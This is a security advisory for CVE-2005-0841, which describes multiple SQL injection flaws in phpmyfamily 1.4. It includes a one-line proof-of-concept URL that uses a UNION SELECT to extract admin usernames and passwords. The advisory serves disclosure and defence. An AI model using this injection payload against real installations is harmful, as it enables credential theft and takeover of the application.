PHPMyFamily Multiple SQL Injection Vulnerabilities

Bugtraq ID:	12860
Class:	Input Validation Error
CVE:	CVE-2005-0841
Remote:	Yes
Local:	No
Published:	Mar 21 2005 12:00AM
Updated:	Jul 12 2009 10:56AM
Credit:	Discovery of this vulnerability is credited to kreon <[email protected]>.
Vulnerable:	phpmyfamily phpmyfamily 1.4
Not Vulnerable:

PHPMyFamily Multiple SQL Injection Vulnerabilities

phpmyfamily is reportedly affected by multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries.

Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.

PHPMyFamily Multiple SQL Injection Vulnerabilities

No exploit is required.

The following proof of concept is available:
http://www.example.com/[myphpfamily]/people.php?person=00002'%20UNION%20SELECT%20NULL,password,NULL,username,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20family_users%20%20WHERE%20admin='Y'%20LIMIT%201,1/*

PHPMyFamily Multiple SQL Injection Vulnerabilities

Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.

PHPMyFamily Multiple SQL Injection Vulnerabilities

References:

• phpmyfamily Homepage (phpmyfamily)
  
• phpMyFamily 1.4.0 SQL vulnerabilities (kreon )